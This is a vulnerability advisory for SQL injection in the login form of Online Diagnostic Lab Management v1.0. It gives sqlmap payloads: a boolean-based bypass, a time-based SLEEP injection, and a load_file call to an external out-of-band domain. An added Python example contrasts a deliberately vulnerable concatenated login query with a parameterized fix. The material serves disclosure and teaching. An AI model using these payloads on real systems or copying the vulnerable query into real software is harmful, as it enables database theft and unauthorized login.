<pre><code>## Title: Online-Diagnostic-Lab-Management v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 08/01/2023
## Vendor: https://www.youtube.com/watch?v=0nA5xfQ5G0g
## Vendor: https://www.youtube.com/@MayuriK
## Software: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter appears to be vulnerable to SQL injection attacks. The payload
'+(select load_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+'
was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can steal all information from the database very easily.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: username (POST)
 Type: boolean-based blind
 Title: OR boolean-based blind - WHERE or HAVING clause
 Payload: username=-2553' OR 3590=3590-- aPlO&password=y4S!v5f!S4&login=

 Type: time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
 Payload: username=hMRUaqVg'+(select load_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+'' AND (SELECT 2815 FROM (SELECT(SLEEP(15)))TjiG)-- NgnE&password=y4S!v5f!S4&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Online-Diagnostic-Lab-Management-1.10)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/07/online-diagnostic-lab-management-v10.html)

## Time spent:
00:35:00
</code></pre>
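<p>Added example, not part of the advisory and not the vendor's code: the root cause behind a finding like this is a login query assembled by string concatenation, so the block below shows that pattern beside the parameterized form that removes the injection, and runs the advisory's own boolean-based payload against both. It is written in Python over an in-memory SQLite database as a stand-in for the application's PHP/MySQL stack (an assumption; the single-quote and <code>--</code> comment handling the payload relies on behaves the same in both engines), with a constructed <code>users</code> table. The time-based and load_file payloads are not exercised because SQLite has no SLEEP or load_file.</p>

```python
# Added example (not from the advisory or the vendor's software). SQLite stands
# in for MySQL here (assumption); the users table and credentials are constructed.
import sqlite3

# Boolean-based blind payload taken verbatim from the advisory's sqlmap output.
BOOLEAN_BLIND_PAYLOAD = "-2553' OR 3590=3590-- aPlO"


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with one constructed user record."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('admin', 'correct-horse')"
    )
    conn.commit()
    return conn


def login_concatenated(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """VULNERABLE: the request values are spliced into the SQL text.

    A quote character in `username` closes the string literal and `--` comments
    out the password check, so the statement's structure is under the caller's
    control. This is the shape of query the advisory's finding implies.
    """
    sql = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """HARDENED: placeholders keep the statement text fixed.

    The driver sends the values separately from the SQL, so quotes, comment
    markers and sub-queries inside `username` are compared as plain text.
    """
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo() -> dict:
    """Run valid credentials and the injected username through both variants."""
    conn = make_db()
    wrong_password = "y4S!v5f!S4"  # password value from the advisory's request
    return {
        "concat_valid": login_concatenated(conn, "admin", "correct-horse"),
        "concat_injected": login_concatenated(conn, BOOLEAN_BLIND_PAYLOAD, wrong_password),
        "param_valid": login_parameterized(conn, "admin", "correct-horse"),
        "param_injected": login_parameterized(conn, BOOLEAN_BLIND_PAYLOAD, wrong_password),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login accepted' if ok else 'login rejected'}")
```

<p>The concatenated variant accepts the injected username with a wrong password because the injected <code>OR 3590=3590</code> makes the WHERE clause unconditionally true and the trailing <code>--</code> discards the password comparison; the parameterized variant rejects it because the same string is only ever compared as a username value. The same change (PDO or mysqli prepared statements in the PHP login handler) is the fix for the finding in this advisory; input filtering alone does not address the time-based or load_file variants.</p>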